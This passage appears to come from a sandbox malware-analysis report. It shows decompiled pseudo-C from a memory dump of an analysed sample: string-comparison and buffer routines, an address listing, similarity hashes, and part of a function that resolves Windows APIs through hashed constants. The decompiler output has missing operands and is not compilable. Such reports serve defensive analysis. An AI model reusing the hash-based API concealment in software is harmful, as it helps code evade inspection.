												goto L42;
											} else {
												if(__eflags > 0) {
													L42:
													_v44 = _t182;
													_t320 = 0;
													__eflags = 0;
													_v52 = _t224;
													_v48 = _t337;
													_v36 = _t282;
													while(1) {
														_t225 =  *(_t258 + _t320 * 2) & 0x0000ffff;
														_t70 = _t225 - 0x61; // -97
														_t339 =  *(_a8 + _t320 * 2) & 0x0000ffff;
														__eflags = _t70 - 0x19;
														_t73 = _t225 - 0x20; // -32
														_t226 =  <=  ? _t73 :  *(_t258 + _t320 * 2) & 0x0000ffff;
														_t184 = ( <=  ? _t73 :  *(_t258 + _t320 * 2) & 0x0000ffff) & 0x0000ffff;
														__eflags = _t339 - 0x61 - 0x19;
														_t340 =  <=  ? _t339 - 0x20 : _t339;
														__eflags = _t184 - ( <=  ? _t339 - 0x20 : _t339);
														if(__eflags < 0 || __eflags > 0) {
															break;
														}
														__eflags = _t184;
														if(_t184 == 0) {
															L47:
															_t224 = _v52;
															_t337 = _v48;
															_t281 = _v36;
															_t187 = _v28;
															_t323 = _a8;
															goto L48;
														} else {
															_t320 = _t320 + 1;
															__eflags = _t320 - _v44;
															if(_t320 < _v44) {
																continue;
															} else {
																goto L47;
															}
														}
														goto L137;
													}
													_t228 = _v52;
													_t341 = _v48;
													_t285 = _v36;
													_t322 = _t258 + 2;
													__eflags = _t322;
													if(_t322 == 0) {
														goto L15;
													} else {
														__eflags =  *(_t258 + 2) & 0x0000ffff;
														if(( *(_t258 + 2) & 0x0000ffff) == 0) {
															goto L15;
														} else {
															_v52 = _t228;
															_t186 = 0;
															__eflags = 0;
															_v48 = _t341;
															_v36 = _t285;
															_v32 = _t258;
															while(1) {
																_t186 = _t186 + 1;
																_t256 = _v32 + _t186 * 2;
																_t286 =  *_t256 & 0x0000ffff;
																__eflags = ( *(_t322 + _t186 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																_t287 =  <=  ? _t286 + 0x20 : _t286;
																__eflags = ( <=  ? _t286 + 0x20 : _t286) - _v40;
																if(( <=  ? _t286 + 0x20 : _t286) == _v40) {
																	break;
																}
																__eflags =  *(_t322 + _t186 * 2) & 0x0000ffff;
																if(( *(_t322 + _t186 * 2) & 0x0000ffff) != 0) {
																	continue;
																} else {
																	goto L15;
																}
																goto L137;
															}
															_t224 = _v52;
															_t337 = _v48;
															_t281 = _v36;
															continue;
														}
													}
												} else {
													_t187 = _v28;
													_t323 = _a8;
													L48:
													__eflags = _t258;
													if(_t258 == 0) {
														goto L15;
													} else {
														__eflags = _t224;
														if(_t224 == 0) {
															L55:
															_t293 =  ~( ~_t224 + 0x00000007 & 0x00000007) + 0x7fffffff;
															__eflags = _t293;
															while(1) {
																asm("movdqu xmm1, [edi+ebx*2]");
																asm("pcmpeqw xmm1, xmm0");
																asm("pmovmskb esi, xmm1");
																__eflags = _t337;
																if(_t337 != 0) {
																	break;
																}
																_t224 = _t224 + 8;
																__eflags = _t224 - _t293;
																if(_t224 < _t293) {
																	continue;
																} else {
																	__eflags = _t293 - 0x7fffffff;
																	if(_t293 >= 0x7fffffff) {
																		goto L61;
																	} else {
																		goto L59;
																	}
																}
																goto L62;
															}
															asm("bsf edx, esi");
															_t293 = (_t293 >> 1) + _t224;
														} else {
															__eflags = _t281;
															_t293 = 0;
															if(_t281 != 0) {
																while(1) {
																	L59:
																	__eflags =  *(_t323 + _t293 * 2) & 0x0000ffff;
																	if(( *(_t323 + _t293 * 2) & 0x0000ffff) == 0) {
																		goto L62;
																	}
																	_t293 = _t293 + 1;
																	__eflags = _t293 - 0x7fffffff;
																	if(_t293 < 0x7fffffff) {
																		continue;
																	} else {
																		L61:
																		_t293 = 0x7fffffff;
																	}
																	goto L62;
																}
															} else {
																_v28 = _t187;
																_t224 = _t337;
																while(1) {
																	__eflags =  *(_t323 + _t293 * 2) & 0x0000ffff;
																	if(( *(_t323 + _t293 * 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t293 = _t293 + 1;
																	__eflags = _t293 - _t337;
																	if(_t293 < _t337) {
																		continue;
																	} else {
																		_t187 = _v28;
																		goto L55;
																	}
																	goto L62;
																}
																_t187 = _v28;
															}
														}
														L62:
														_t344 = _t187 & 0x0000000f;
														__eflags = _t344;
														if(_t344 == 0) {
															L67:
															_t237 =  ~( ~_t344 + 0x00000007 & 0x00000007) + 0x7fffffff;
															__eflags = _t237;
															while(1) {
																asm("movdqu xmm1, [eax+esi*2]");
																asm("pcmpeqw xmm1, xmm0");
																asm("pmovmskb edi, xmm1");
																__eflags = _t323;
																if(_t323 != 0) {
																	break;
																}
																_t344 = _t344 + 8;
																__eflags = _t344 - _t237;
																if(_t344 < _t237) {
																	continue;
																} else {
																	__eflags = _t237 - 0x7fffffff;
																	if(_t237 >= 0x7fffffff) {
																		goto L73;
																	} else {
																		goto L71;
																	}
																}
																goto L74;
															}
															asm("bsf ebx, edi");
															_t237 = (_t237 >> 1) + _t344;
														} else {
															_t237 = 0;
															__eflags = _t344 & 0x00000001;
															if((_t344 & 0x00000001) != 0) {
																while(1) {
																	L71:
																	__eflags =  *(_t187 + _t237 * 2) & 0x0000ffff;
																	if(( *(_t187 + _t237 * 2) & 0x0000ffff) == 0) {
																		goto L74;
																	}
																	_t237 = _t237 + 1;
																	__eflags = _t237 - 0x7fffffff;
																	if(_t237 < 0x7fffffff) {
																		continue;
																	} else {
																		L73:
																		_t237 = 0x7fffffff;
																	}
																	goto L74;
																}
															} else {
																_t344 =  ~_t344 + 0x10 >> 1;
																__eflags = _t344;
																while(1) {
																	_t323 =  *(_t187 + _t237 * 2) & 0x0000ffff;
																	__eflags = _t323;
																	if(_t323 == 0) {
																		goto L74;
																	}
																	_t237 = _t237 + 1;
																	__eflags = _t237 - _t344;
																	if(_t237 < _t344) {
																		continue;
																	} else {
																		goto L67;
																	}
																	goto L74;
																}
															}
														}
														L74:
														_t263 = (_t258 - _t187 >> 1) + _t293;
														__eflags = _t263;
														_t264 =  <=  ? 0 : _t263;
														__eflags = _t237 - _t264;
														_t265 =  <  ? _t237 : _t264;
														_t239 = _t237 - _t265;
														_t324 = _t187 + _t265 * 2;
														_t188 = _a4;
														 *_t188 = 0;
														 *((intOrPtr*)(_t188 + 4)) = 0;
														__eflags = _t324;
														if(_t324 == 0) {
															L110:
															_push(0x80);
															_t240 = E003B1030();
															_t353 = _t353 + 4;
															_t191 =  *_a4;
															__eflags = _t191;
															if(_t191 == 0) {
																__eflags = 0;
																 *_t240 = 0;
															} else {
																__eflags = _t240;
																if(_t240 != 0) {
																	_t296 =  *_t191 & 0x0000ffff;
																	 *_t240 = _t296;
																	__eflags = _t296;
																	if(_t296 != 0) {
																		_t297 = 0;
																		__eflags = 0;
																		while(1) {
																			_t297 = _t297 + 1;
																			_t266 =  *(_t191 + _t297 * 4 - 2) & 0x0000ffff;
																			 *(_t240 + _t297 * 4 - 2) = _t266;
																			__eflags = _t266;
																			if(_t266 == 0) {
																				goto L116;
																			}
																			_t267 =  *(_t191 + _t297 * 4) & 0x0000ffff;
																			 *(_t240 + _t297 * 4) = _t267;
																			__eflags = _t267;
																			if(_t267 != 0) {
																				continue;
																			}
																			goto L116;
																		}
																	}
																}
																L116:
																_push(2);
																_push(_t191);
																E003B10B0();
																_t353 = _t353 + 8;
															}
															_t193 = _a4;
															_t193[1] = 0x40;
															 *_t193 = _t240;
														} else {
															_t196 =  *_t324 & 0x0000ffff;
															__eflags = _t196;
															if(_t196 == 0) {
																goto L110;
															} else {
																__eflags = _t239;
																if(_t239 == 0) {
																	_t307 = _t324 & 0x0000000f;
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L82:
																		_t239 =  ~( ~_t307 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t239;
																		while(1) {
																			asm("movdqu xmm1, [edi+edx*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb eax, xmm1");
																			__eflags = _t196;
																			if(_t196 != 0) {
																				break;
																			}
																			_t307 = _t307 + 8;
																			__eflags = _t307 - _t239;
																			if(_t307 < _t239) {
																				continue;
																			} else {
																				__eflags = _t239 - 0x7fffffff;
																				if(_t239 >= 0x7fffffff) {
																					goto L88;
																				} else {
																					goto L86;
																				}
																			}
																			goto L89;
																		}
																		asm("bsf ebx, eax");
																		_t239 = (_t239 >> 1) + _t307;
																	} else {
																		_t239 = 0;
																		__eflags = _t307 & 0x00000001;
																		if((_t307 & 0x00000001) != 0) {
																			while(1) {
																				L86:
																				__eflags =  *(_t324 + _t239 * 2) & 0x0000ffff;
																				if(( *(_t324 + _t239 * 2) & 0x0000ffff) == 0) {
																					goto L89;
																				}
																				_t239 = _t239 + 1;
																				__eflags = _t239 - 0x7fffffff;
																				if(_t239 < 0x7fffffff) {
																					continue;
																				} else {
																					L88:
																					_t239 = 0x7fffffff;
																				}
																				goto L89;
																			}
																		} else {
																			_t307 =  ~_t307 + 0x10 >> 1;
																			__eflags = _t307;
																			while(1) {
																				_t196 =  *(_t324 + _t239 * 2) & 0x0000ffff;
																				__eflags = _t196;
																				if(_t196 == 0) {
																					goto L89;
																				}
																				_t239 = _t239 + 1;
																				__eflags = _t239 - _t307;
																				if(_t239 < _t307) {
																					continue;
																				} else {
																					goto L82;
																				}
																				goto L89;
																			}
																		}
																	}
																}
																L89:
																_t103 = _t239 + 1; // -2147483653
																_t298 = _t103;
																__eflags = _t298 - 0x40;
																_t299 =  <=  ? 0x40 : _t298;
																__eflags = _t299;
																if(_t299 > 0) {
																	_t202 = (_t299 >> 5 >> 0x1a) + _t299 >> 6;
																	_t300 = _t299 & 0x8000003f;
																	__eflags = _t300;
																	if(_t300 < 0) {
																		_t300 = (_t300 - 0x00000001 | 0xffffffc0) + 1;
																		__eflags = _t300;
																	}
																	__eflags = _t300;
																	_t203 = _t202 + (0 | _t300 > 0x00000000);
																	_push(_t203 << 7);
																	_t347 = _t203 << 6;
																	_t303 = E003B1030();
																	_t353 = _t353 + 4;
																	_t268 =  *_a4;
																	__eflags = _t268;
																	if(_t268 == 0) {
																		__eflags = 0;
																		 *_t303 = 0;
																	} else {
																		__eflags = _t303;
																		if(_t303 != 0) {
																			_t212 =  *_t268 & 0x0000ffff;
																			 *_t303 = _t212;
																			__eflags = _t212;
																			if(_t212 != 0) {
																				_v52 = _t324;
																				_t213 = 0;
																				__eflags = 0;
																				while(1) {
																					_t213 = _t213 + 1;
																					_t326 =  *(_t268 + _t213 * 4 - 2) & 0x0000ffff;
																					 *(_t303 + _t213 * 4 - 2) = _t326;
																					__eflags = _t326;
																					if(_t326 == 0) {
																						break;
																					}
																					_t327 =  *(_t268 + _t213 * 4) & 0x0000ffff;
																					 *(_t303 + _t213 * 4) = _t327;
																					__eflags = _t327;
																					if(_t327 != 0) {
																						continue;
																					}
																					break;
																				}
																				_t324 = _v52;
																			}
																		}
																		_push(2);
																		_push(_t268);
																		_v52 = _t303;
																		E003B10B0();
																		_t303 = _v52;
																		_t353 = _t353 + 8;
																	}
																	_t208 = _a4;
																	_t208[1] = _t347;
																	 *_t208 = _t303;
																} else {
																	_t303 = 0;
																}
																__eflags = _t303;
																if(_t303 != 0) {
																	_t209 = 0;
																	while(1) {
																		_t269 =  *_t324 & 0x0000ffff;
																		_t209 = _t209 + 1;
																		 *_t303 = _t269;
																		__eflags = _t239;
																		if(_t239 == 0) {
																			goto L108;
																		}
																		__eflags = _t209 - _t239;
																		if(_t209 == _t239) {
																			 *(_t303 + 2) = 0;
																		} else {
																			goto L108;
																		}
																		goto L119;
																		L108:
																		__eflags = _t269;
																		if(_t269 != 0) {
																			_t303 = _t303 + 2;
																			_t324 = _t324 + 2;
																			__eflags = _t324;
																			continue;
																		}
																		goto L119;
																	}
																}
															}
														}
														L119:
														return _a4;
													}
												}
											}
										}
										goto L137;
										L33:
										_v32 = _t256;
										_t179 =  ~( ~_t319 + 0x00000007 & 0x00000007) + 0x7fffffff;
										__eflags = _t179;
										_v36 = _t281;
										while(1) {
											asm("movdqu xmm1, [ecx+edi*2]");
											asm("pcmpeqw xmm1, xmm0");
											asm("pmovmskb edx, xmm1");
											__eflags = _t281;
											if(_t281 != 0) {
												break;
											}
											_t319 = _t319 + 8;
											__eflags = _t319 - _t179;
											if(_t319 < _t179) {
												continue;
											} else {
												_t282 = _v36;
												_t258 = _v32;
												__eflags = _t179 - 0x7fffffff;
												if(_t179 >= 0x7fffffff) {
													goto L41;
												} else {
													goto L37;
												}
											}
											goto L137;
										}
										asm("bsf eax, eax");
										_t282 = _v36;
										_t182 = (_t281 >> 1) + _t319;
										_t258 = _v32;
										goto L121;
									}
								}
							}
						}
					} else {
						goto L2;
					}
				}
				L137:
			}

0x003bbf59
0x003bbf5c
0x003bbf61
0x003bbf6a
0x003bbf6a
0x003bbf6d
0x003bbf6f
0x003bbf74
0x003bbf76
0x003bbf7e
0x003bbf80
0x003bbf86
0x003bbf8a
0x003bbfc2
0x003bbf8c
0x003bbf8e
0x003bbf90
0x003bbf93
0x003bbf98
0x003bbf9a
0x003bbf9a
0x003bbf9b
0x003bbfa0
0x003bbfa7
0x00000000
0x00000000
0x003bbfa9
0x003bbfad
0x003bbfb3
0x00000000
0x00000000
0x00000000
0x003bbfb3
0x003bbf9a
0x003bbf98
0x003bbfb5
0x003bbfb5
0x003bbfb7
0x003bbfb8
0x003bbfbd
0x003bbfbd
0x003bbfc5
0x003bbfc8
0x003bbfcf
0x003bbfda
0x003bbf63
0x003bbf63
0x003bbf68
0x003bbfdd
0x003bbfdf
0x003bbfe1
0x003bc021
0x003bc021
0x003bc026
0x003bc02b
0x003bc02d
0x003bc035
0x003bc037
0x003bc03d
0x003bc03f
0x003bc041
0x003bc07b
0x003bc07d
0x003bc043
0x003bc043
0x003bc045
0x003bc047
0x003bc04a
0x003bc04d
0x003bc04f
0x003bc051
0x003bc051
0x003bc053
0x003bc053
0x003bc054
0x003bc059
0x003bc05e
0x003bc060
0x00000000
0x00000000
0x003bc062
0x003bc066
0x003bc06a
0x003bc06c
0x00000000
0x00000000
0x00000000
0x003bc06c
0x003bc053
0x003bc04f
0x003bc06e
0x003bc06e
0x003bc070
0x003bc071
0x003bc076
0x003bc076
0x003bc080
0x003bc083
0x003bc08a
0x003bc095
0x003bbfe3
0x003bbfe6
0x003bbfe8
0x00000000
0x003bbfea
0x003bbfed
0x003bbff3
0x003bbff6
0x003bbff6
0x003bbff8
0x003bbffb
0x003bbfff
0x003bbfff
0x003bc003
0x003bc006
0x003bc009
0x003bc00c
0x003bc00f
0x003bc012
0x00000000
0x00000000
0x003bc018
0x003bc01d
0x003bc01f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc01f
0x003bc098
0x003bc09b
0x003bc09e
0x003bc0a0
0x00000000
0x003bc0a6
0x003bc0a8
0x003bc0ab
0x003bc0b5
0x003bc0bb
0x003bc0bd
0x003bc0ce
0x003bc0ce
0x003bc0d0
0x003bc0d2
0x00000000
0x00000000
0x003bc0d4
0x003bc0d6
0x003bc0d8
0x003bc147
0x003bc147
0x003bc14b
0x003bc14e
0x003bc152
0x003bc154
0x00000000
0x00000000
0x003bc15a
0x003bc15b
0x003bc160
0x00000000
0x003bc162
0x003bc162
0x00000000
0x003bc162
0x00000000
0x003bc160
0x003bc56a
0x00000000
0x003bc0da
0x003bc0da
0x003bc0de
0x003bc0e0
0x003bc0e4
0x003bc0e7
0x003bc0eb
0x003bc0ed
0x00000000
0x00000000
0x003bc0f3
0x003bc0f4
0x003bc0f6
0x00000000
0x003bc0f8
0x003bc0f8
0x003bc0fc
0x00000000
0x003bc0fc
0x00000000
0x003bc0f6
0x003bc4aa
0x003bc4ae
0x003bc4b2
0x003bc4b2
0x003bc4b4
0x003bc166
0x003bc166
0x00000000
0x003bc4ba
0x003bc4ba
0x003bc16b
0x003bc16b
0x003bc16f
0x003bc16f
0x003bc171
0x003bc174
0x003bc178
0x003bc17c
0x003bc17c
0x003bc183
0x003bc186
0x003bc18a
0x003bc18d
0x003bc190
0x003bc193
0x003bc199
0x003bc19f
0x003bc1a2
0x003bc1a5
0x00000000
0x00000000
0x003bc1b1
0x003bc1b3
0x003bc1bc
0x003bc1bc
0x003bc1bf
0x003bc1c3
0x003bc1c7
0x003bc1cb
0x00000000
0x003bc1b5
0x003bc1b5
0x003bc1b6
0x003bc1ba
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc1ba
0x00000000
0x003bc1b3
0x003bc501
0x003bc504
0x003bc508
0x003bc50e
0x003bc50e
0x003bc511
0x00000000
0x003bc517
0x003bc51b
0x003bc51d
0x00000000
0x003bc523
0x003bc523
0x003bc526
0x003bc526
0x003bc528
0x003bc52c
0x003bc530
0x003bc534
0x003bc534
0x003bc53e
0x003bc541
0x003bc547
0x003bc551
0x003bc554
0x003bc557
0x00000000
0x00000000
0x003bc561
0x003bc563
0x00000000
0x003bc565
0x00000000
0x003bc565
0x00000000
0x003bc563
0x003bc0c3
0x003bc0c6
0x003bc0ca
0x00000000
0x003bc0ca
0x003bc51d
0x003bc4c0
0x003bc4c0
0x003bc4c4
0x003bc1ce
0x003bc1ce
0x003bc1d0
0x00000000
0x003bc1d6
0x003bc1d6
0x003bc1d8
0x003bc1fe
0x003bc20a
0x003bc20a
0x003bc210
0x003bc210
0x003bc215
0x003bc219
0x003bc21d
0x003bc21f
0x00000000
0x00000000
0x003bc225
0x003bc228
0x003bc22a
0x00000000
0x003bc22c
0x003bc22c
0x003bc232
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc232
0x00000000
0x003bc22a
0x003bc4f5
0x003bc4fa
0x003bc1da
0x003bc1da
0x003bc1dc
0x003bc1e1
0x003bc234
0x003bc234
0x003bc238
0x003bc23a
0x00000000
0x00000000
0x003bc23c
0x003bc23d
0x003bc243
0x00000000
0x003bc245
0x003bc245
0x003bc245
0x003bc245
0x00000000
0x003bc243
0x003bc1e3
0x003bc1e3
0x003bc1e7
0x003bc1e9
0x003bc1ed
0x003bc1ef
0x00000000
0x00000000
0x003bc1f5
0x003bc1f6
0x003bc1f8
0x00000000
0x003bc1fa
0x003bc1fa
0x00000000
0x003bc1fa
0x00000000
0x003bc1f8
0x003bc4cc
0x003bc4cc
0x003bc1e1
0x003bc24a
0x003bc24c
0x003bc24c
0x003bc24f
0x003bc26f
0x003bc27b
0x003bc27b
0x003bc281
0x003bc281
0x003bc286
0x003bc28a
0x003bc28e
0x003bc290
0x00000000
0x00000000
0x003bc296
0x003bc299
0x003bc29b
0x00000000
0x003bc29d
0x003bc29d
0x003bc2a3
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc2a3
0x00000000
0x003bc29b
0x003bc4e9
0x003bc4ee
0x003bc251
0x003bc251
0x003bc253
0x003bc259
0x003bc2a5
0x003bc2a5
0x003bc2a9
0x003bc2ab
0x00000000
0x00000000
0x003bc2ad
0x003bc2ae
0x003bc2b4
0x00000000
0x003bc2b6
0x003bc2b6
0x003bc2b6
0x003bc2b6
0x00000000
0x003bc2b4
0x003bc25b
0x003bc260
0x003bc260
0x003bc262
0x003bc262
0x003bc266
0x003bc268
0x00000000
0x00000000
0x003bc26a
0x003bc26b
0x003bc26d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc26d
0x003bc262
0x003bc259
0x003bc2bb
0x003bc2bf
0x003bc2c3
0x003bc2c5
0x003bc2c8
0x003bc2ca
0x003bc2cd
0x003bc2cf
0x003bc2d2
0x003bc2d5
0x003bc2d7
0x003bc2da
0x003bc2dc
0x003bc43a
0x003bc43a
0x003bc444
0x003bc446
0x003bc44c
0x003bc44e
0x003bc450
0x003bc48a
0x003bc48c
0x003bc452
0x003bc452
0x003bc454
0x003bc456
0x003bc459
0x003bc45c
0x003bc45e
0x003bc460
0x003bc460
0x003bc462
0x003bc462
0x003bc463
0x003bc468
0x003bc46d
0x003bc46f
0x00000000
0x00000000
0x003bc471
0x003bc475
0x003bc479
0x003bc47b
0x00000000
0x00000000
0x00000000
0x003bc47b
0x003bc462
0x003bc45e
0x003bc47d
0x003bc47d
0x003bc47f
0x003bc480
0x003bc485
0x003bc485
0x003bc48f
0x003bc492
0x003bc499
0x003bc2e2
0x003bc2e2
0x003bc2e5
0x003bc2e7
0x00000000
0x003bc2ed
0x003bc2ed
0x003bc2ef
0x003bc2f3
0x003bc2f3
0x003bc2f6
0x003bc313
0x003bc31f
0x003bc31f
0x003bc325
0x003bc325
0x003bc32a
0x003bc32e
0x003bc332
0x003bc334
0x00000000
0x00000000
0x003bc33a
0x003bc33d
0x003bc33f
0x00000000
0x003bc341
0x003bc341
0x003bc347
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc347
0x00000000
0x003bc33f
0x003bc4dd
0x003bc4e2
0x003bc2f8
0x003bc2f8
0x003bc2fa
0x003bc2fd
0x003bc349
0x003bc349
0x003bc34d
0x003bc34f
0x00000000
0x00000000
0x003bc351
0x003bc352
0x003bc358
0x00000000
0x003bc35a
0x003bc35a
0x003bc35a
0x003bc35a
0x00000000
0x003bc358
0x003bc2ff
0x003bc304
0x003bc304
0x003bc306
0x003bc306
0x003bc30a
0x003bc30c
0x00000000
0x00000000
0x003bc30e
0x003bc30f
0x003bc311
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc311
0x003bc306
0x003bc2fd
0x003bc2f6
0x003bc35f
0x003bc364
0x003bc364
0x003bc367
0x003bc36a
0x003bc36d
0x003bc36f
0x003bc382
0x003bc385
0x003bc385
0x003bc38b
0x003bc393
0x003bc393
0x003bc393
0x003bc394
0x003bc39e
0x003bc3a5
0x003bc3a6
0x003bc3ae
0x003bc3b0
0x003bc3b6
0x003bc3b8
0x003bc3ba
0x003bc402
0x003bc404
0x003bc3bc
0x003bc3bc
0x003bc3be
0x003bc3c0
0x003bc3c3
0x003bc3c6
0x003bc3c8
0x003bc3ca
0x003bc3cd
0x003bc3cd
0x003bc3cf
0x003bc3cf
0x003bc3d0
0x003bc3d5
0x003bc3da
0x003bc3dc
0x00000000
0x00000000
0x003bc3de
0x003bc3e2
0x003bc3e6
0x003bc3e8
0x00000000
0x00000000
0x00000000
0x003bc3e8
0x003bc3ea
0x003bc3ea
0x003bc3c8
0x003bc3ed
0x003bc3ef
0x003bc3f0
0x003bc3f4
0x003bc3f9
0x003bc3fd
0x003bc3fd
0x003bc407
0x003bc40a
0x003bc40d
0x003bc371
0x003bc371
0x003bc371
0x003bc40f
0x003bc411
0x003bc417
0x003bc421
0x003bc421
0x003bc424
0x003bc425
0x003bc428
0x003bc42a
0x00000000
0x00000000
0x003bc42c
0x003bc42e
0x003bc4d7
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc434
0x003bc434
0x003bc436
0x003bc41b
0x003bc41e
0x003bc41e
0x00000000
0x003bc41e
0x00000000
0x003bc436
0x003bc421
0x003bc411
0x003bc2e7
0x003bc49b
0x003bc4a7
0x003bc4a7
0x003bc1d0
0x003bc4ba
0x003bc4b4
0x00000000
0x003bc100
0x003bc10c
0x003bc110
0x003bc110
0x003bc115
0x003bc11c
0x003bc11c
0x003bc121
0x003bc125
0x003bc129
0x003bc12b
0x00000000
0x00000000
0x003bc131
0x003bc134
0x003bc136
0x00000000
0x003bc138
0x003bc138
0x003bc13c
0x003bc140
0x003bc145
0x00000000
0x00000000
0x00000000
0x00000000
0x003bc145
0x00000000
0x003bc136
0x003bc575
0x003bc57a
0x003bc57e
0x003bc580
0x00000000
0x003bc580
0x003bc0ce
0x003bc0a0
0x003bbfe8
0x00000000
0x00000000
0x00000000
0x003bbf68
0x00000000

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction ID: 2ca09b7c5ed840342243da4f23387360e36acf28b7a36961d7442878016e3206
Opcode Fuzzy Hash: e5d19c950d3206712b1004c452d88e64ae12569de0aad1d6093721ce458abcaa
Instruction Fuzzy Hash: 4B1258716203128BCB368F29C4901BA73E2FFD4718B19D62DEA958BB91EB35DC41C391

Uniqueness

Uniqueness Score: -1.00%

Function 003ACA10, Relevance: .5, Instructions: 479
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E003ACA10(signed int __ecx, void* __eflags) {
				void* __ebx;
				void* __ebp;
				unsigned int _t114;
				signed int _t125;
				void* _t136;
				void* _t143;
				unsigned int _t145;
				intOrPtr* _t194;
				void* _t221;
				signed int _t237;
				intOrPtr _t239;
				signed int _t242;
				signed int _t245;
				intOrPtr* _t246;
				intOrPtr* _t248;
				unsigned int _t250;
				unsigned int _t336;
				unsigned int _t338;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t347;
				signed int _t351;
				intOrPtr* _t352;
				signed int _t353;
				void* _t354;
				intOrPtr* _t355;
				intOrPtr _t358;
				signed int _t361;
				intOrPtr* _t362;
				intOrPtr* _t363;
				intOrPtr _t364;
				unsigned int _t365;
				signed int _t366;
				signed int _t370;
				signed int _t374;
				void* _t375;
				void* _t376;

				_t376 = _t375 - 0x7c;
				_t237 = __ecx;
				E003AE3A0(_t376 + 0x68,  *((intOrPtr*)(__ecx)), 0x7fffffff);
				if(E003C9660(_t376 + 0x64) != 0) {
					 *((intOrPtr*)(_t237 + 0x28)) = 0;
					E003C9510(_t376 + 0x64);
					return 0xffffffff;
				} else {
					_t370 = _t237 + 4;
					_t114 = E003C9650(_t370);
					_t358 = _t237 + 0x18;
					if(_t114 >> 2 > 0) {
						 *((intOrPtr*)(_t376 + 0x74)) = _t358;
						_t353 = 0;
						 *(_t376 + 0x40) = _t237;
						do {
							_t366 = _t353 * 4;
							_t246 = E003C9640(_t370, _t366);
							_t338 = E003C9650(_t376 + 0x64) >> 2;
							if(_t338 <= 0) {
								L8:
								if(E003C9650(_t370) > _t366) {
									_t247 = 4 + _t353 * 4;
									if(E003C9650(_t370) > 4 + _t353 * 4) {
										 *(_t376 + 0x38) = E003C9640(_t370, _t366);
										 *(_t376 + 0x34) = E003C9640(_t370, _t247);
										E003B0BC0( *(_t376 + 0x40),  *(_t376 + 0x38), E003C9650(_t370) - _t247);
										_t376 = _t376 + 0xc;
									}
									E003C9670(_t370, E003C9650(_t370) + 0xfffffffc);
								}
								_t248 = E003B15C0(0x588ab3ea, 0x35b39b2b);
								if(_t248 != 0) {
									 *_t248( *((intOrPtr*)(E003C9640( *((intOrPtr*)(_t376 + 0x78)), _t366))));
								}
								if(E003C9650( *((intOrPtr*)(_t376 + 0x74))) > _t366) {
									_t249 = 4 + _t353 * 4;
									if(E003C9650( *((intOrPtr*)(_t376 + 0x74))) > 4 + _t353 * 4) {
										_t221 = E003C9640( *((intOrPtr*)(_t376 + 0x78)), _t366);
										 *((intOrPtr*)(_t376 + 0x3c)) = E003C9640( *((intOrPtr*)(_t376 + 0x78)), _t249);
										E003B0BC0(_t221,  *(_t376 + 0x40), E003C9650( *((intOrPtr*)(_t376 + 0x74))) - _t249);
										_t376 = _t376 + 0xc;
									}
									E003C9670( *((intOrPtr*)(_t376 + 0x78)), E003C9650( *((intOrPtr*)(_t376 + 0x74))) + 0xfffffffc);
								}
								_t354 = _t353 - 1;
							} else {
								 *(_t376 + 0x44) = _t353;
								_t355 = _t246;
								 *(_t376 + 0x48) = _t370;
								_t374 = 0;
								_t250 = _t338;
								while( *((intOrPtr*)(E003C9640(_t376 + 0x68, _t374 * 4))) !=  *_t355) {
									_t374 = _t374 + 1;
									if(_t374 < _t250) {
										continue;
									} else {
										_t353 =  *(_t376 + 0x44);
										_t370 =  *(_t376 + 0x48);
										goto L8;
									}
									goto L13;
								}
								_t353 =  *(_t376 + 0x44);
								_t370 =  *(_t376 + 0x48);
								if(_t374 == 0xffffffff) {
									goto L8;
								} else {
									goto L13;
								}
								L33:
								 *(_t376 + 0x34) = 0;
								_push(0);
								E003C9350(_t376 + 0x3c);
								 *((intOrPtr*)(_t376 + 0x4c)) =  *_t237;
								_push(0);
								E003C9350(_t376 + 0x54);
								_t331 = E003C9650(_t358) >> 2;
								_t125 =  <  ? E003C9650(_t358) >> 2 : 0x40;
								if(0x40 <= 0) {
									_t341 = E003B15C0(0xa1310f65, 0x813508bf);
									if(_t341 == 0) {
										_t342 = 0;
										goto L42;
									} else {
										 *(_t376 + 0x48) = E003C9650(_t376 + 0x38);
										_t136 = E003C9640(_t376 + 0x3c, 0);
										_t342 =  *_t341( *(_t376 + 0x54) >> 2, _t136, 0, 0x3e8);
										if(_t342 == 0xffffffff || _t342 == 0x102) {
											goto L43;
										} else {
											L42:
											 *((intOrPtr*)(_t237 + 0x28)) =  *((intOrPtr*)(E003C9640(_t358, _t342 << 2)));
											 *((intOrPtr*)(_t237 + 0x2c)) =  *((intOrPtr*)(E003C9640(_t370, _t342 << 2)));
											_t239 =  *((intOrPtr*)(_t237 + 0x28));
											asm("cdq");
											E003AE2F0(_t239, _t376 + 0x4c, _t331);
											E003AE2F0(_t239, _t376 + 0x34, _t331);
											return _t239;
										}
									}
								} else {
									 *((intOrPtr*)(_t376 + 0x74)) = _t358;
									 *(_t376 + 0x48) = _t370;
									_t370 = _t237;
									_t237 = _t125;
									 *((intOrPtr*)(_t376 + 0x60)) = 0;
									_t143 = E003B15C0(0xa1310f65, 0x2a01082);
									if(_t143 == 0) {
										L43:
										E003AE2F0(_t237, _t376 + 0x4c, _t370);
										E003AE2F0(_t237, _t376 + 0x34, _t370);
										return 0xffffffff;
									} else {
										_push(0);
										_push(0);
										_push(1);
										_push(0);
										asm("int3");
										return _t143;
									}
								}
								goto L65;
							}
							L13:
							_t353 = _t354 + 1;
						} while (_t353 < E003C9650(_t370) >> 2);
						_t358 =  *((intOrPtr*)(_t376 + 0x74));
						_t237 =  *(_t376 + 0x40);
